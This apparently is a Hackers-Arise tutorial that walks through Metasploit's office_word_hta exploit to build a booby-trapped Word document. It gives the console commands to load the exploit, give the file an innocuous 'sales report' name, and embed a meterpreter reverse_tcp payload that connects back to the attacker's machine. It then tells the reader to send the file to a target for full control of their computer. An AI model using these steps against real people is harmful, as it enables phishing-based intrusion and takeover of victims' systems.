Welcome back, my fledgling hackers!
As the operating system developers become more and more security conscious, operating system exploits become rarer. Not so rare that we don't see them anymore (see ExternalBlue and the .NET vulnerability CVE-2017-8759), but rare enough that hackers tend to focus their efforts on the applications and their output files for exploitation. These might include such things as PDF, .doc, rtf, .jpg, .lnk and .xls files. These type of exploits are referred to as "file format" exploits because they exploit a particular file format.
Metasploit has a large number of these file format exploits. To find them, we can go to the:
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
directory in Metasploit. There, we can find numerous exploits that fit the file format category. One of the best and most recent is known as the Office Word hta exploit.
This exploit, first found in the wild in late 2016, enables us to create a carefully crafted Office document that when opened by the target will embed a rootkit within their system and give us complete control.
Let's look at this exploit in this tutorial.
Step #1 Fire Up Kali and Open Metasploit
Step #2 Search for Office Word hta exploit
With the Metasploit console now open, let's look for this exploit.
msf> search type:exploit fileformat
As you can see above, Metasploit returned a large number of exploits, but I highlighted the "Malicious Office Word Malicious Hta Execution". That's the one we want to use here.
Step 3 Load the Office Word HTA Exploit
Let's now load that exploit.
msf > use exploit/windows/fileformat/office_word_hta
Now, with the exploit loaded, let's take a look at the information on this exploit.
msf > info
As you can see above, this exploit creates a malicious RTF file that will enable us to execute our code on the target system when they open it. That's exactly what we want to do!
Step #4 Show Options
The next step is to take a look at our options for this exploit.
msf > show options
As you can see, we need to set the FILENAME (it defaults to msf.doc. Not very stealthy), the URIPATH and the SRVHOST.
msf > set FILENAME hackersarise_sales_report
msf > set URIPATH hackersarise
msf > set SRVHOST 192.168.1.115
Step #5 Set The PAYLOAD
The next step is to set the PAYLOAD we want to embed on the target system when they open the file. Let's choose our powerful and trusty /windows/meterpreter/reverse_tcp
msf > set PAYLOAD windows/meterpreter/reverse_tcp
When we once again "show options", we can see that we need to set the payload LHOST.
Let's set it to our Kali system
msf > set LHOST 192.168.1.115
Now, all we need to do is enter exploit and Metasploit generates a file named hackersarise_sales_report and places it in /root/.msf4/local directory. It then starts a server at 192.168.1.115 on port 8080. Now, all we need to do is send the file to the target and we then open it, it will connect to our server and download the meterpreter and connect back to our Kali system giving us unfettered access to their computer.
We should receive a meterpreter prompt like that above.
Keep coming back my fledgling hackers on how to use Metasploit for hacking in this "Metasploit Basics" series and nearly every other form of hacking on Hackers-Arise!